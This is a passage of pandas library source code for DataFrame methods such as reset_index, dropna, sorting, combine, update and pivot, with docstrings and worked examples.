lion mammal 80.5
monkey mammal NaN
When we reset the index, the old index is added as a column, and a
new sequential index is used:
>>> df.reset_index()
index class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
We can use the `drop` parameter to avoid the old index being added as
a column:
>>> df.reset_index(drop=True)
class max_speed
0 bird 389.0
1 bird 24.0
2 mammal 80.5
3 mammal NaN
You can also use `reset_index` with `MultiIndex`.
>>> index = pd.MultiIndex.from_tuples([('bird', 'falcon'),
... ('bird', 'parrot'),
... ('mammal', 'lion'),
... ('mammal', 'monkey')],
... names=['class', 'name'])
>>> columns = pd.MultiIndex.from_tuples([('speed', 'max'),
... ('species', 'type')])
>>> df = pd.DataFrame([(389.0, 'fly'),
... ( 24.0, 'fly'),
... ( 80.5, 'run'),
... (np.nan, 'jump')],
... index=index,
... columns=columns)
>>> df
speed species
max type
class name
bird falcon 389.0 fly
parrot 24.0 fly
mammal lion 80.5 run
monkey NaN jump
If the index has multiple levels, we can reset a subset of them:
>>> df.reset_index(level='class')
class speed species
max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
If we are not dropping the index, by default, it is placed in the top
level. We can place it in another level:
>>> df.reset_index(level='class', col_level=1)
speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
When the index is inserted under another level, we can specify under
which one with the parameter `col_fill`:
>>> df.reset_index(level='class', col_level=1, col_fill='species')
species speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
If we specify a nonexistent level for `col_fill`, it is created:
>>> df.reset_index(level='class', col_level=1, col_fill='genus')
genus speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if inplace:
new_obj = self
else:
new_obj = self.copy()
def _maybe_casted_values(index, labels=None):
values = index._values
if not isinstance(index, (PeriodIndex, DatetimeIndex)):
if values.dtype == np.object_:
values = lib.maybe_convert_objects(values)
# if we have the labels, extract the values with a mask
if labels is not None:
mask = labels == -1
# we can have situations where the whole mask is -1,
# meaning there is nothing found in labels, so make all nan's
if mask.all():
values = np.empty(len(mask))
values.fill(np.nan)
else:
values = values.take(labels)
if mask.any():
values, changed = maybe_upcast_putmask(
values, mask, np.nan)
return values
new_index = com._default_index(len(new_obj))
if level is not None:
if not isinstance(level, (tuple, list)):
level = [level]
level = [self.index._get_level_number(lev) for lev in level]
if isinstance(self.index, MultiIndex):
if len(level) < self.index.nlevels:
new_index = self.index.droplevel(level)
if not drop:
if isinstance(self.index, MultiIndex):
names = [n if n is not None else ('level_%d' % i)
for (i, n) in enumerate(self.index.names)]
to_insert = lzip(self.index.levels, self.index.labels)
else:
default = 'index' if 'index' not in self else 'level_0'
names = ([default] if self.index.name is None
else [self.index.name])
to_insert = ((self.index, None),)
multi_col = isinstance(self.columns, MultiIndex)
for i, (lev, lab) in reversed(list(enumerate(to_insert))):
if not (level is None or i in level):
continue
name = names[i]
if multi_col:
col_name = (list(name) if isinstance(name, tuple)
else [name])
if col_fill is None:
if len(col_name) not in (1, self.columns.nlevels):
raise ValueError("col_fill=None is incompatible "
"with incomplete column name "
"{}".format(name))
col_fill = col_name[0]
lev_num = self.columns._get_level_number(col_level)
name_lst = [col_fill] * lev_num + col_name
missing = self.columns.nlevels - len(name_lst)
name_lst += [col_fill] * missing
name = tuple(name_lst)
# to ndarray and maybe infer different dtype
level_values = _maybe_casted_values(lev, lab)
new_obj.insert(0, name, level_values)
new_obj.index = new_index
if not inplace:
return new_obj
# ----------------------------------------------------------------------
# Reindex-based selection methods
@Appender(_shared_docs['isna'] % _shared_doc_kwargs)
def isna(self):
return super(DataFrame, self).isna()
@Appender(_shared_docs['isna'] % _shared_doc_kwargs)
def isnull(self):
return super(DataFrame, self).isnull()
@Appender(_shared_docs['notna'] % _shared_doc_kwargs)
def notna(self):
return super(DataFrame, self).notna()
@Appender(_shared_docs['notna'] % _shared_doc_kwargs)
def notnull(self):
return super(DataFrame, self).notnull()
def dropna(self, axis=0, how='any', thresh=None, subset=None,
inplace=False):
"""
Remove missing values.
See the :ref:`User Guide <missing_data>` for more on which values are
considered missing, and how to work with missing data.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, or tuple/list thereof
Determine if rows or columns which contain missing values are
removed.
* 0, or 'index' : Drop rows which contain missing values.
* 1, or 'columns' : Drop columns which contain missing value.
Pass tuple or list to drop on multiple axes.
how : {'any', 'all'}, default 'any'
Determine if row or column is removed from DataFrame, when we have
at least one NA or all NA.
* 'any' : If any NA values are present, drop that row or column.
* 'all' : If all values are NA, drop that row or column.
thresh : int, optional
Require that many non-NA values.
subset : array-like, optional
Labels along other axis to consider, e.g. if you are dropping rows
these would be a list of columns to include.
inplace : bool, default False
If True, do operation inplace and return None.
Returns
-------
DataFrame
DataFrame with NA entries dropped from it.
See Also
--------
DataFrame.isna: Indicate missing values.
DataFrame.notna : Indicate existing (non-missing) values.
DataFrame.fillna : Replace missing values.
Series.dropna : Drop missing values.
Index.dropna : Drop missing indices.
Examples
--------
>>> df = pd.DataFrame({"name": ['Alfred', 'Batman', 'Catwoman'],
... "toy": [np.nan, 'Batmobile', 'Bullwhip'],
... "born": [pd.NaT, pd.Timestamp("1940-04-25"),
... pd.NaT]})
>>> df
name toy born
0 Alfred NaN NaT
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Drop the rows where at least one element is missing.
>>> df.dropna()
name toy born
1 Batman Batmobile 1940-04-25
Drop the columns where at least one element is missing.
>>> df.dropna(axis='columns')
name
0 Alfred
1 Batman
2 Catwoman
Drop the rows where all elements are missing.
>>> df.dropna(how='all')
name toy born
0 Alfred NaN NaT
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Keep only the rows with at least 2 non-NA values.
>>> df.dropna(thresh=2)
name toy born
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Define in which columns to look for missing values.
>>> df.dropna(subset=['name', 'born'])
name toy born
1 Batman Batmobile 1940-04-25
Keep the DataFrame with valid entries in the same variable.
>>> df.dropna(inplace=True)
>>> df
name toy born
1 Batman Batmobile 1940-04-25
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if isinstance(axis, (tuple, list)):
result = self
for ax in axis:
result = result.dropna(how=how, thresh=thresh, subset=subset,
axis=ax)
else:
axis = self._get_axis_number(axis)
agg_axis = 1 - axis
agg_obj = self
if subset is not None:
ax = self._get_axis(agg_axis)
indices = ax.get_indexer_for(subset)
check = indices == -1
if check.any():
raise KeyError(list(np.compress(check, subset)))
agg_obj = self.take(indices, axis=agg_axis)
count = agg_obj.count(axis=agg_axis)
if thresh is not None:
mask = count >= thresh
elif how == 'any':
mask = count == len(agg_obj._get_axis(agg_axis))
elif how == 'all':
mask = count > 0
else:
if how is not None:
raise ValueError('invalid how option: %s' % how)
else:
raise TypeError('must specify how or thresh')
result = self._take(mask.nonzero()[0], axis=axis, convert=False)
if inplace:
self._update_inplace(result)
else:
return result
def drop_duplicates(self, subset=None, keep='first', inplace=False):
"""
Return DataFrame with duplicate rows removed, optionally only
considering certain columns
Parameters
----------
subset : column label or sequence of labels, optional
Only consider certain columns for identifying duplicates, by
default use all of the columns
keep : {'first', 'last', False}, default 'first'
- ``first`` : Drop duplicates except for the first occurrence.
- ``last`` : Drop duplicates except for the last occurrence.
- False : Drop all duplicates.
inplace : boolean, default False
Whether to drop duplicates in place or to return a copy
Returns
-------
deduplicated : DataFrame
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
duplicated = self.duplicated(subset, keep=keep)
if inplace:
inds, = (-duplicated).nonzero()
new_data = self._data.take(inds)
self._update_inplace(new_data)
else:
return self[-duplicated]
def duplicated(self, subset=None, keep='first'):
"""
Return boolean Series denoting duplicate rows, optionally only
considering certain columns
Parameters
----------
subset : column label or sequence of labels, optional
Only consider certain columns for identifying duplicates, by
default use all of the columns
keep : {'first', 'last', False}, default 'first'
- ``first`` : Mark duplicates as ``True`` except for the
first occurrence.
- ``last`` : Mark duplicates as ``True`` except for the
last occurrence.
- False : Mark all duplicates as ``True``.
Returns
-------
duplicated : Series
"""
from pandas.core.sorting import get_group_index
from pandas._libs.hashtable import duplicated_int64, _SIZE_HINT_LIMIT
def f(vals):
labels, shape = algorithms.factorize(
vals, size_hint=min(len(self), _SIZE_HINT_LIMIT))
return labels.astype('i8', copy=False), len(shape)
if subset is None:
subset = self.columns
elif (not np.iterable(subset) or
isinstance(subset, compat.string_types) or
isinstance(subset, tuple) and subset in self.columns):
subset = subset,
# Verify all columns in subset exist in the queried dataframe
# Otherwise, raise a KeyError, same as if you try to __getitem__ with a
# key that doesn't exist.
diff = Index(subset).difference(self.columns)
if not diff.empty:
raise KeyError(diff)
vals = (col.values for name, col in self.iteritems()
if name in subset)
labels, shape = map(list, zip(*map(f, vals)))
ids = get_group_index(labels, shape, sort=False, xnull=False)
return Series(duplicated_int64(ids, keep), index=self.index)
# ----------------------------------------------------------------------
# Sorting
@Appender(_shared_docs['sort_values'] % _shared_doc_kwargs)
def sort_values(self, by, axis=0, ascending=True, inplace=False,
kind='quicksort', na_position='last'):
inplace = validate_bool_kwarg(inplace, 'inplace')
axis = self._get_axis_number(axis)
stacklevel = 2 # Number of stack levels from df.sort_values
if not isinstance(by, list):
by = [by]
if is_sequence(ascending) and len(by) != len(ascending):
raise ValueError('Length of ascending (%d) != length of by (%d)' %
(len(ascending), len(by)))
if len(by) > 1:
from pandas.core.sorting import lexsort_indexer
keys = []
for x in by:
k = self._get_label_or_level_values(x, axis=axis,
stacklevel=stacklevel)
keys.append(k)
indexer = lexsort_indexer(keys, orders=ascending,
na_position=na_position)
indexer = _ensure_platform_int(indexer)
else:
from pandas.core.sorting import nargsort
by = by[0]
k = self._get_label_or_level_values(by, axis=axis,
stacklevel=stacklevel)
if isinstance(ascending, (tuple, list)):
ascending = ascending[0]
indexer = nargsort(k, kind=kind, ascending=ascending,
na_position=na_position)
new_data = self._data.take(indexer,
axis=self._get_block_manager_axis(axis),
verify=False)
if inplace:
return self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
@Appender(_shared_docs['sort_index'] % _shared_doc_kwargs)
def sort_index(self, axis=0, level=None, ascending=True, inplace=False,
kind='quicksort', na_position='last', sort_remaining=True,
by=None):
# TODO: this can be combined with Series.sort_index impl as
# almost identical
inplace = validate_bool_kwarg(inplace, 'inplace')
# 10726
if by is not None:
warnings.warn("by argument to sort_index is deprecated, "
"please use .sort_values(by=...)",
FutureWarning, stacklevel=2)
if level is not None:
raise ValueError("unable to simultaneously sort by and level")
return self.sort_values(by, axis=axis, ascending=ascending,
inplace=inplace)
axis = self._get_axis_number(axis)
labels = self._get_axis(axis)
if level:
new_axis, indexer = labels.sortlevel(level, ascending=ascending,
sort_remaining=sort_remaining)
elif isinstance(labels, MultiIndex):
from pandas.core.sorting import lexsort_indexer
# make sure that the axis is lexsorted to start
# if not we need to reconstruct to get the correct indexer
labels = labels._sort_levels_monotonic()
indexer = lexsort_indexer(labels._get_labels_for_sorting(),
orders=ascending,
na_position=na_position)
else:
from pandas.core.sorting import nargsort
# Check monotonic-ness before sort an index
# GH11080
if ((ascending and labels.is_monotonic_increasing) or
(not ascending and labels.is_monotonic_decreasing)):
if inplace:
return
else:
return self.copy()
indexer = nargsort(labels, kind=kind, ascending=ascending,
na_position=na_position)
baxis = self._get_block_manager_axis(axis)
new_data = self._data.take(indexer,
axis=baxis,
verify=False)
# reconstruct axis if needed
new_data.axes[baxis] = new_data.axes[baxis]._sort_levels_monotonic()
if inplace:
return self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
def sortlevel(self, level=0, axis=0, ascending=True, inplace=False,
sort_remaining=True):
"""Sort multilevel index by chosen axis and primary level. Data will be
lexicographically sorted by the chosen level followed by the other
levels (in order).
.. deprecated:: 0.20.0
Use :meth:`DataFrame.sort_index`
Parameters
----------
level : int
axis : {0 or 'index', 1 or 'columns'}, default 0
ascending : boolean, default True
inplace : boolean, default False
Sort the DataFrame without creating a new instance
sort_remaining : boolean, default True
Sort by the other levels too.
Returns
-------
sorted : DataFrame
See Also
--------
DataFrame.sort_index(level=...)
"""
warnings.warn("sortlevel is deprecated, use sort_index(level= ...)",
FutureWarning, stacklevel=2)
return self.sort_index(level=level, axis=axis, ascending=ascending,
inplace=inplace, sort_remaining=sort_remaining)
def nlargest(self, n, columns, keep='first'):
"""
Return the first `n` rows ordered by `columns` in descending order.
Return the first `n` rows with the largest values in `columns`, in
descending order. The columns that are not specified are returned as
well, but not used for ordering.
This method is equivalent to
``df.sort_values(columns, ascending=False).head(n)``, but more
performant.
Parameters
----------
n : int
Number of rows to return.
columns : label or list of labels
Column label(s) to order by.
keep : {'first', 'last'}, default 'first'
Where there are duplicate values:
- `first` : prioritize the first occurrence(s)
- `last` : prioritize the last occurrence(s)
Returns
-------
DataFrame
The first `n` rows ordered by the given columns in descending
order.
See Also
--------
DataFrame.nsmallest : Return the first `n` rows ordered by `columns` in
ascending order.
DataFrame.sort_values : Sort DataFrame by the values
DataFrame.head : Return the first `n` rows without re-ordering.
Notes
-----
This function cannot be used with all column types. For example, when
specifying columns with `object` or `category` dtypes, ``TypeError`` is
raised.
Examples
--------
>>> df = pd.DataFrame({'a': [1, 10, 8, 10, -1],
... 'b': list('abdce'),
... 'c': [1.0, 2.0, np.nan, 3.0, 4.0]})
>>> df
a b c
0 1 a 1.0
1 10 b 2.0
2 8 d NaN
3 10 c 3.0
4 -1 e 4.0
In the following example, we will use ``nlargest`` to select the three
rows having the largest values in column "a".
>>> df.nlargest(3, 'a')
a b c
1 10 b 2.0
3 10 c 3.0
2 8 d NaN
When using ``keep='last'``, ties are resolved in reverse order:
>>> df.nlargest(3, 'a', keep='last')
a b c
3 10 c 3.0
1 10 b 2.0
2 8 d NaN
To order by the largest values in column "a" and then "c", we can
specify multiple columns like in the next example.
>>> df.nlargest(3, ['a', 'c'])
a b c
3 10 c 3.0
1 10 b 2.0
2 8 d NaN
Attempting to use ``nlargest`` on non-numeric dtypes will raise a
``TypeError``:
>>> df.nlargest(3, 'b')
Traceback (most recent call last):
TypeError: Column 'b' has dtype object, cannot use method 'nlargest'
"""
return algorithms.SelectNFrame(self,
n=n,
keep=keep,
columns=columns).nlargest()
def nsmallest(self, n, columns, keep='first'):
"""Get the rows of a DataFrame sorted by the `n` smallest
values of `columns`.
Parameters
----------
n : int
Number of items to retrieve
columns : list or str
Column name or names to order by
keep : {'first', 'last'}, default 'first'
Where there are duplicate values:
- ``first`` : take the first occurrence.
- ``last`` : take the last occurrence.
Returns
-------
DataFrame
Examples
--------
>>> df = pd.DataFrame({'a': [1, 10, 8, 11, -1],
... 'b': list('abdce'),
... 'c': [1.0, 2.0, np.nan, 3.0, 4.0]})
>>> df.nsmallest(3, 'a')
a b c
4 -1 e 4
0 1 a 1
2 8 d NaN
"""
return algorithms.SelectNFrame(self,
n=n,
keep=keep,
columns=columns).nsmallest()
def swaplevel(self, i=-2, j=-1, axis=0):
"""
Swap levels i and j in a MultiIndex on a particular axis
Parameters
----------
i, j : int, string (can be mixed)
Level of index to be swapped. Can pass level name as string.
Returns
-------
swapped : type of caller (new object)
.. versionchanged:: 0.18.1
The indexes ``i`` and ``j`` are now optional, and default to
the two innermost levels of the index.
"""
result = self.copy()
axis = self._get_axis_number(axis)
if axis == 0:
result.index = result.index.swaplevel(i, j)
else:
result.columns = result.columns.swaplevel(i, j)
return result
def reorder_levels(self, order, axis=0):
"""
Rearrange index levels using input order.
May not drop or duplicate levels
Parameters
----------
order : list of int or list of str
List representing new level order. Reference level by number
(position) or by key (label).
axis : int
Where to reorder levels.
Returns
-------
type of caller (new object)
"""
axis = self._get_axis_number(axis)
if not isinstance(self._get_axis(axis),
MultiIndex): # pragma: no cover
raise TypeError('Can only reorder levels on a hierarchical axis.')
result = self.copy()
if axis == 0:
result.index = result.index.reorder_levels(order)
else:
result.columns = result.columns.reorder_levels(order)
return result
# ----------------------------------------------------------------------
# Arithmetic / combination related
def _combine_frame(self, other, func, fill_value=None, level=None):
this, other = self.align(other, join='outer', level=level, copy=False)
new_index, new_columns = this.index, this.columns
def _arith_op(left, right):
# for the mixed_type case where we iterate over columns,
# _arith_op(left, right) is equivalent to
# left._binop(right, func, fill_value=fill_value)
left, right = ops.fill_binop(left, right, fill_value)
return func(left, right)
if this._is_mixed_type or other._is_mixed_type:
# iterate over columns
if this.columns.is_unique:
# unique columns
result = {col: _arith_op(this[col], other[col])
for col in this}
result = self._constructor(result, index=new_index,
columns=new_columns, copy=False)
else:
# non-unique columns
result = {i: _arith_op(this.iloc[:, i], other.iloc[:, i])
for i, col in enumerate(this.columns)}
result = self._constructor(result, index=new_index, copy=False)
result.columns = new_columns
return result
else:
result = _arith_op(this.values, other.values)
return self._constructor(result, index=new_index, columns=new_columns,
copy=False)
def _combine_match_index(self, other, func, level=None):
left, right = self.align(other, join='outer', axis=0, level=level,
copy=False)
new_data = func(left.values.T, right.values).T
return self._constructor(new_data,
index=left.index, columns=self.columns,
copy=False)
def _combine_match_columns(self, other, func, level=None, try_cast=True):
left, right = self.align(other, join='outer', axis=1, level=level,
copy=False)
new_data = left._data.eval(func=func, other=right,
axes=[left.columns, self.index],
try_cast=try_cast)
return self._constructor(new_data)
def _combine_const(self, other, func, errors='raise', try_cast=True):
new_data = self._data.eval(func=func, other=other,
errors=errors,
try_cast=try_cast)
return self._constructor(new_data)
def _compare_frame(self, other, func, str_rep):
# compare_frame assumes self._indexed_same(other)
import pandas.core.computation.expressions as expressions
# unique
if self.columns.is_unique:
def _compare(a, b):
return {col: func(a[col], b[col]) for col in a.columns}
new_data = expressions.evaluate(_compare, str_rep, self, other)
return self._constructor(data=new_data, index=self.index,
columns=self.columns, copy=False)
# non-unique
else:
def _compare(a, b):
return {i: func(a.iloc[:, i], b.iloc[:, i])
for i, col in enumerate(a.columns)}
new_data = expressions.evaluate(_compare, str_rep, self, other)
result = self._constructor(data=new_data, index=self.index,
copy=False)
result.columns = self.columns
return result
def combine(self, other, func, fill_value=None, overwrite=True):
"""
Add two DataFrame objects and do not propagate NaN values, so if for a
(column, time) one frame is missing a value, it will default to the
other frame's value (which might be NaN as well)
Parameters
----------
other : DataFrame
func : function
Function that takes two series as inputs and return a Series or a
scalar
fill_value : scalar value
overwrite : boolean, default True
If True then overwrite values for common keys in the calling frame
Returns
-------
result : DataFrame
Examples
--------
>>> df1 = DataFrame({'A': [0, 0], 'B': [4, 4]})
>>> df2 = DataFrame({'A': [1, 1], 'B': [3, 3]})
>>> df1.combine(df2, lambda s1, s2: s1 if s1.sum() < s2.sum() else s2)
A B
0 0 3
1 0 3
See Also
--------
DataFrame.combine_first : Combine two DataFrame objects and default to
non-null values in frame calling the method
"""
other_idxlen = len(other.index) # save for compare
this, other = self.align(other, copy=False)
new_index = this.index
if other.empty and len(new_index) == len(self.index):
return self.copy()
if self.empty and len(other) == other_idxlen:
return other.copy()
# sorts if possible
new_columns = this.columns.union(other.columns)
do_fill = fill_value is not None
result = {}
for col in new_columns:
series = this[col]
otherSeries = other[col]
this_dtype = series.dtype
other_dtype = otherSeries.dtype
this_mask = isna(series)
other_mask = isna(otherSeries)
# don't overwrite columns unecessarily
# DO propagate if this column is not in the intersection
if not overwrite and other_mask.all():
result[col] = this[col].copy()
continue
if do_fill:
series = series.copy()
otherSeries = otherSeries.copy()
series[this_mask] = fill_value
otherSeries[other_mask] = fill_value
# if we have different dtypes, possibly promote
new_dtype = this_dtype
if not is_dtype_equal(this_dtype, other_dtype):
new_dtype = find_common_type([this_dtype, other_dtype])
if not is_dtype_equal(this_dtype, new_dtype):
series = series.astype(new_dtype)
if not is_dtype_equal(other_dtype, new_dtype):
otherSeries = otherSeries.astype(new_dtype)
# see if we need to be represented as i8 (datetimelike)
# try to keep us at this dtype
needs_i8_conversion_i = needs_i8_conversion(new_dtype)
if needs_i8_conversion_i:
arr = func(series, otherSeries, True)
else:
arr = func(series, otherSeries)
if do_fill:
arr = _ensure_float(arr)
arr[this_mask & other_mask] = np.nan
# try to downcast back to the original dtype
if needs_i8_conversion_i:
# ToDo: This conversion should be handled in
# _maybe_cast_to_datetime but the change affects lot...
if is_datetime64tz_dtype(new_dtype):
arr = DatetimeIndex._simple_new(arr, tz=new_dtype.tz)
else:
arr = maybe_cast_to_datetime(arr, new_dtype)
else:
arr = maybe_downcast_to_dtype(arr, this_dtype)
result[col] = arr
# convert_objects just in case
return self._constructor(result, index=new_index,
columns=new_columns)._convert(datetime=True,
copy=False)
def combine_first(self, other):
"""
Combine two DataFrame objects and default to non-null values in frame
calling the method. Result index columns will be the union of the
respective indexes and columns
Parameters
----------
other : DataFrame
Returns
-------
combined : DataFrame
Examples
--------
df1's values prioritized, use values from df2 to fill holes:
>>> df1 = pd.DataFrame([[1, np.nan]])
>>> df2 = pd.DataFrame([[3, 4]])
>>> df1.combine_first(df2)
0 1
0 1 4.0
See Also
--------
DataFrame.combine : Perform series-wise operation on two DataFrames
using a given function
"""
import pandas.core.computation.expressions as expressions
def combiner(x, y, needs_i8_conversion=False):
x_values = x.values if hasattr(x, 'values') else x
y_values = y.values if hasattr(y, 'values') else y
if needs_i8_conversion:
mask = isna(x)
x_values = x_values.view('i8')
y_values = y_values.view('i8')
else:
mask = isna(x_values)
return expressions.where(mask, y_values, x_values)
return self.combine(other, combiner, overwrite=False)
def update(self, other, join='left', overwrite=True, filter_func=None,
raise_conflict=False):
"""
Modify in place using non-NA values from another DataFrame.
Aligns on indices. There is no return value.
Parameters
----------
other : DataFrame, or object coercible into a DataFrame
Should have at least one matching index/column label
with the original DataFrame. If a Series is passed,
its name attribute must be set, and that will be
used as the column name to align with the original DataFrame.
join : {'left'}, default 'left'
Only left join is implemented, keeping the index and columns of the
original object.
overwrite : bool, default True
How to handle non-NA values for overlapping keys:
* True: overwrite original DataFrame's values
with values from `other`.
* False: only update values that are NA in
the original DataFrame.
filter_func : callable(1d-array) -> boolean 1d-array, optional
Can choose to replace values other than NA. Return True for values
that should be updated.
raise_conflict : bool, default False
If True, will raise a ValueError if the DataFrame and `other`
both contain non-NA data in the same place.
Raises
------
ValueError
When `raise_conflict` is True and there's overlapping non-NA data.
See Also
--------
dict.update : Similar method for dictionaries.
DataFrame.merge : For column(s)-on-columns(s) operations.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, 5, 6],
... 'C': [7, 8, 9]})
>>> df.update(new_df)
>>> df
A B
0 1 4
1 2 5
2 3 6
The DataFrame's length does not increase as a result of the update,
only values at matching index/column labels are updated.
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e', 'f', 'g', 'h', 'i']})
>>> df.update(new_df)
>>> df
A B
0 a d
1 b e
2 c f
For Series, it's name attribute must be set.
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_column = pd.Series(['d', 'e'], name='B', index=[0, 2])
>>> df.update(new_column)
>>> df
A B
0 a d
1 b y
2 c e
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e']}, index=[1, 2])
>>> df.update(new_df)
>>> df
A B
0 a x
1 b d
2 c e
If `other` contains NaNs the corresponding values are not updated
in the original dataframe.
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, np.nan, 6]})
>>> df.update(new_df)
>>> df
A B
0 1 4.0
1 2 500.0
2 3 6.0
"""
import pandas.core.computation.expressions as expressions
# TODO: Support other joins
if join != 'left': # pragma: no cover
raise NotImplementedError("Only left join is supported")
if not isinstance(other, DataFrame):
other = DataFrame(other)
other = other.reindex_like(self)
for col in self.columns:
this = self[col].values
that = other[col].values
if filter_func is not None:
with np.errstate(all='ignore'):
mask = ~filter_func(this) | isna(that)
else:
if raise_conflict:
mask_this = notna(that)
mask_that = notna(this)
if any(mask_this & mask_that):
raise ValueError("Data overlaps.")
if overwrite:
mask = isna(that)
else:
mask = notna(this)
# don't overwrite columns unecessarily
if mask.all():
continue
self[col] = expressions.where(mask, this, that)
# ----------------------------------------------------------------------
# Misc methods
def _get_valid_indices(self):
is_valid = self.count(1) > 0
return self.index[is_valid]
@Appender(_shared_docs['valid_index'] % {
'position': 'first', 'klass': 'DataFrame'})
def first_valid_index(self):
if len(self) == 0:
return None
valid_indices = self._get_valid_indices()
return valid_indices[0] if len(valid_indices) else None
@Appender(_shared_docs['valid_index'] % {
'position': 'last', 'klass': 'DataFrame'})
def last_valid_index(self):
if len(self) == 0:
return None
valid_indices = self._get_valid_indices()
return valid_indices[-1] if len(valid_indices) else None
# ----------------------------------------------------------------------
# Data reshaping
def pivot(self, index=None, columns=None, values=None):
"""
Return reshaped DataFrame organized by given index / column values.
Reshape data (produce a "pivot" table) based on column values. Uses
unique values from specified `index` / `columns` to form axes of the
resulting DataFrame. This function does not support data
aggregation, multiple values will result in a MultiIndex in the
columns. See the :ref:`User Guide <reshaping>` for more on reshaping.
Parameters
----------
index : string or object, optional
Column to use to make new frame's index. If None, uses
existing index.
columns : string or object
Column to use to make new frame's columns.
values : string, object or a list of the previous, optional
Column(s) to use for populating new frame's values. If not
specified, all remaining columns will be used and the result will
have hierarchically indexed columns.
.. versionchanged :: 0.23.0
Also accept list of column names.
Returns
-------
DataFrame
Returns reshaped DataFrame.
Raises
------
ValueError:
When there are any `index`, `columns` combinations with multiple
values. `DataFrame.pivot_table` when you need to aggregate.
See Also
--------
DataFrame.pivot_table : generalization of pivot that can handle
duplicate values for one index/column pair.
DataFrame.unstack : pivot based on the index values instead of a
column.
Notes
-----
For finer-tuned control, see hierarchical indexing documentation along
with the related stack/unstack methods.
Examples
--------
>>> df = pd.DataFrame({'foo': ['one', 'one', 'one', 'two', 'two',
... 'two'],
... 'bar': ['A', 'B', 'C', 'A', 'B', 'C'],
... 'baz': [1, 2, 3, 4, 5, 6],
... 'zoo': ['x', 'y', 'z', 'q', 'w', 't']})
>>> df
foo bar baz zoo
0 one A 1 x
1 one B 2 y
2 one C 3 z
3 two A 4 q
4 two B 5 w
5 two C 6 t
>>> df.pivot(index='foo', columns='bar', values='baz')
bar A B C
foo
one 1 2 3
two 4 5 6
>>> df.pivot(index='foo', columns='bar')['baz']
bar A B C
foo
one 1 2 3
two 4 5 6
>>> df.pivot(index='foo', columns='bar', values=['baz', 'zoo'])
baz zoo
bar A B C A B C
foo
one 1 2 3 x y z
two 4 5 6 q w t
A ValueError is raised if there are any duplicates.
>>> df = pd.DataFrame({"foo": ['one', 'one', 'two', 'two'],
... "bar": ['A', 'A', 'B', 'C'],
... "baz": [1, 2, 3, 4]})
>>> df
foo bar baz
0 one A 1
1 one A 2
2 two B 3
3 two C 4
Notice that the first two rows are the same for our `index`
and `columns` arguments.
>>> df.pivot(index='foo', columns='bar', values='baz')
Traceback (most recent call last):
...
ValueError: Index contains duplicate entries, cannot reshape
"""
from pandas.core.reshape.reshape import pivot
return pivot(self, index=index, columns=columns, values=values)
_shared_docs['pivot_table'] = """
Create a spreadsheet-style pivot table as a DataFrame. The levels in
the pivot table will be stored in MultiIndex objects (hierarchical
indexes) on the index and columns of the result DataFrame
Parameters
----------%s
values : column to aggregate, optional
index : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table index. If an array is passed,
it is being used as the same manner as column values.
columns : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table column. If an array is passed,
it is being used as the same manner as column values.
aggfunc : function, list of functions, dict, default numpy.mean
If list of functions passed, the resulting pivot table will have
hierarchical columns whose top level are the function names
(inferred from the function objects themselves)
If dict is passed, the key is column to aggregate and value
is function or list of functions
fill_value : scalar, default None
Value to replace missing values with
margins : boolean, default False
Add all row / columns (e.g. for subtotal / grand totals)
dropna : boolean, default True
Do not include columns whose entries are all NaN
margins_name : string, default 'All'
Name of the row / column that will contain the totals
when margins is True.
Examples
--------
>>> df = pd.DataFrame({"A": ["foo", "foo", "foo", "foo", "foo",
... "bar", "bar", "bar", "bar"],
... "B": ["one", "one", "one", "two", "two",
... "one", "one", "two", "two"],
... "C": ["small", "large", "large", "small",
... "small", "large", "small", "small",
... "large"],
... "D": [1, 2, 2, 3, 3, 4, 5, 6, 7]})
>>> df
A B C D
0 foo one small 1
1 foo one large 2
2 foo one large 2
3 foo two small 3
4 foo two small 3
5 bar one large 4
6 bar one small 5
7 bar two small 6
8 bar two large 7
>>> table = pivot_table(df, values='D', index=['A', 'B'],
... columns=['C'], aggfunc=np.sum)
>>> table
C large small
A B
bar one 4.0 5.0
two 7.0 6.0
foo one 4.0 1.0
two NaN 6.0
>>> table = pivot_table(df, values='D', index=['A', 'B'],
... columns=['C'], aggfunc=np.sum)
>>> table
C large small
A B
bar one 4.0 5.0
two 7.0 6.0
foo one 4.0 1.0
two NaN 6.0
>>> table = pivot_table(df, values=['D', 'E'], index=['A', 'C'],
... aggfunc={'D': np.mean,
... 'E': [min, max, np.mean]})
>>> table
D E
mean max median min
A C
bar large 5.500000 16 14.5 13
small 5.500000 15 14.5 14
foo large 2.000000 10 9.5 9
small 2.333333 12 11.0 8
Returns
-------
table : DataFrame
See also
--------
DataFrame.pivot : pivot without aggregation that can handle
